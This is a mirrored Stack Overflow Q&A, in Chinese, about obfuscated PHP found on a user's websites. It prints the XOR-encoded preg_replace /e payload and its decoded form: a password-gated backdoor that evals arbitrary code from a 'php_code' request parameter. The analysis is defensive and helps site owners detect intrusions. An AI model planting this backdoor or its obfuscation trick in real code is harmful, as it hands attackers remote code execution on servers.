php - 解码奇怪且可能是恶意的 PHP 代码-6ren

php - 解码奇怪且可能是恶意的 PHP 代码

转载作者：可可西里更新时间：2023-11-01 00:16:16

27

4

我在我的一些网站上看到以下代码:

preg_replace("/lWkTSJcPlD6Ty3nInmjgvJ=vcL/e", "d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH"^"\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa", "lWkTSJcPlD6Ty3nInmjgvJ=vcL");
?>

我尝试像普通评估一样解码并通过一些解析，但没有成功。任何人都知道如何解码并查看它的作用？

它在 preg_replace 上使用了/e(eval)修饰符，但似乎没有做任何事情//

最佳答案

查看第二部分，我注意到它是 2 个字符串被异或在一起:

php > $x="d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH";                                              
php > $y="\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa";
php > $z=$x^$y;
php > print $z;
eval("if(isset(\\$_REQUEST['ch']) && (md5(\\$_REQUEST['ch']) == '568bf80805f0a16c104efd05f626234a') && isset(\\$_REQUEST['php_code'])) { eval(\\$_REQUEST['php_code']); exit(); }")
php >

它在 'ch' 中查找“密码”，如果密码哈希匹配，则评估 php_code 参数中的内容。

虽然我不确定 preg_replace 是如何产生的

编辑

似乎 preg 替换正在替换与替换不匹配的内容，导致刚刚解码的内容运行。考虑这个例子

<?php
preg_replace("/X/e","eval('print 1;');",'X');
?>

如果您运行它，它只会打印 1. 查看您的访问日志以查找带有这些 url 参数(ch 和 php_code)的命中

关于php - 解码奇怪且可能是恶意的 PHP 代码，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/8813126/

27

4

0

文章推荐： php - 在 PHP 中将文件名更改为 uniqid

文章推荐： javascript - 按位符号符号是如何工作的~

文章推荐： php - 配置文件错误 EasyPHP 和 WAMP 不工作

Golang 中的 Json 解码/解码
我有以下 json: {"results": [{"columns":["room_id","player_name","player_ip"], "types":["integer","text
json - Golang 解码/解码 JSON 中的无效 unicode
我在 go 中获取格式不一致的 JSON 文件。例如，我可以有以下内容: {"email": "\"blah.blah@blah.com\""} {"email": "robert@gmail.com
javascript - JavaScript 中的 JSON 编码/解码 base64 编码/解码
JavaScript中有JSON编码/解码base64编码/解码函数吗？最佳答案是的，btoa() 和 atob() 在某些浏览器中可以工作: var enc = btoa("this is so
Encog之一 - 解码
我在其中一个项目中使用了 Encog，但在解码 One-Of Class 时卡住了。该字段的规范化操作之一是 NormalizationAction.OneOf，它具有三个输出。当我评估时，我想解码预
R:序列化不完全匹配的文本的base64编码/解码
在我的 previous question关于使用 serialize() 创建对象的 CSV 我从 jmoy 那里得到了一个很好的答案，他推荐了我的序列化文本的 base64 编码。这正是我要找的。
解码 JPEG 文件时跨浏览器不兼容？
有些事情让我感到困惑 - 为什么 this image在每个浏览器中显示不同？ IE9(和 Windows 照片查看器)中的图像: Firefox(和 Photoshop)中的图像: Chrome(和
java - JAXB 解码
是否可以在不知道它的类型( JAXBContext.newInstance(clazz) )的情况下解码一个类，或者什么是测试即将到来的正确方法？我确实收到了从纯文本中解码的消息 - 字符串传入的
OpenSSL Base64 解码
我正在尝试使用 openSSL 库进行 Base64 解码，然后使用 CMS 来验证签名。下面的代码总是将缓冲区打印为 NULL。 char signed_data[] = "MIIO"; int
iphone - 如何对选择器的引用进行编码/解码？
我有一个带有 SEL 类型实例变量的类，它是对选择器的引用。在encodeWithCoder/initWithCoder中，如何编码/解码这种类型的变量？最佳答案您可以使用 NSStringFro
javascript - 解码 ReadableByteStreams
var url = 'http://www.googleapis.com/customsearch/v1?q=foo&searchType=image'; window.fetch(url) .t
android - 在Android中支持对视频文件进行编码/解码
我想知道Android 2.2、2.3和3,4支持的音频/视频格式列表。我也想知道哪些Android版本支持视频编码和解码。我经历了this link，但是关于编码和解码我并不清楚。任何人的回答都是
Encog One Of - 解码
我在其中一个项目中使用 Encog，但在解码 One-Of 类时遇到了困难。该字段的规范化操作之一是 NormalizationAction.OneOf，它具有三个输出。当我评估时，我想解码预测值。如
java - 解码 XML
我正在尝试解码现有的 xml 文件，以便我可以正确处理数据，但 XML 结构看起来很奇怪。下面是 xml 示例以及我创建的对象。 11 266 AA1001 1
Unicode URL 解码
对 unicode 字符进行 URL 编码的常用方法是将其拆分为 2 %HH 代码。 (\u4161 => %41%61) 但是，unicode在解码时是如何区分的呢？您如何知道 %41%61 是 \
Java 解码 JSON
我正在尝试将 json 字符串解码为 Map。我知道有很多这样的问题，但我需要非常具体的格式。例如，我有 json 字符串: { "map": { "a": "b",
SQL 解码 - 选择和位置
我有一个查询，我认为需要像这样(解码会更大) SELECT firstName, lastName, decode(mathMrk, 80, 'A', mathMrk) as decodeMat
PHP 仅对数字和字符进行字符串编码/解码
我知道PHP函数encode()和decode()，它们对我来说工作得很好，但我想在url中传递编码字符串，但encode确实返回特殊字符，如“=”、“”' “等等...... 这显然会破坏我的脚本，
Java - Base64 解码
我必须解码 Basic bW9uTG9naW46bW9uTW90RGVQYXNz 形式的 http 请求的授权 header 当我解码它时online ，我得到了正确的结果 monLogin:monM
java - 哪个Java库提供base64编码/解码？
这个问题已经有答案了: Decode Base64 data in Java (21 个回答) 已关闭 8 年前。我想知道使用哪个库进行 Base64 编码/解码？我需要此功能足够稳定以供生产使用。
java - 解码 [] 字节我只得到字符��
我正在尝试从 Arduino BT 解码 []byte，我的连接完美，问题是当我尝试解码数组时。我得到的只是这个字符�(发送的字节数相同)我认为问题出在解码上。我尝试使用 ASCII 字符集，但仍然存

首页

博学

6Ren·AI

商城

php - 解码奇怪且可能是恶意的 PHP 代码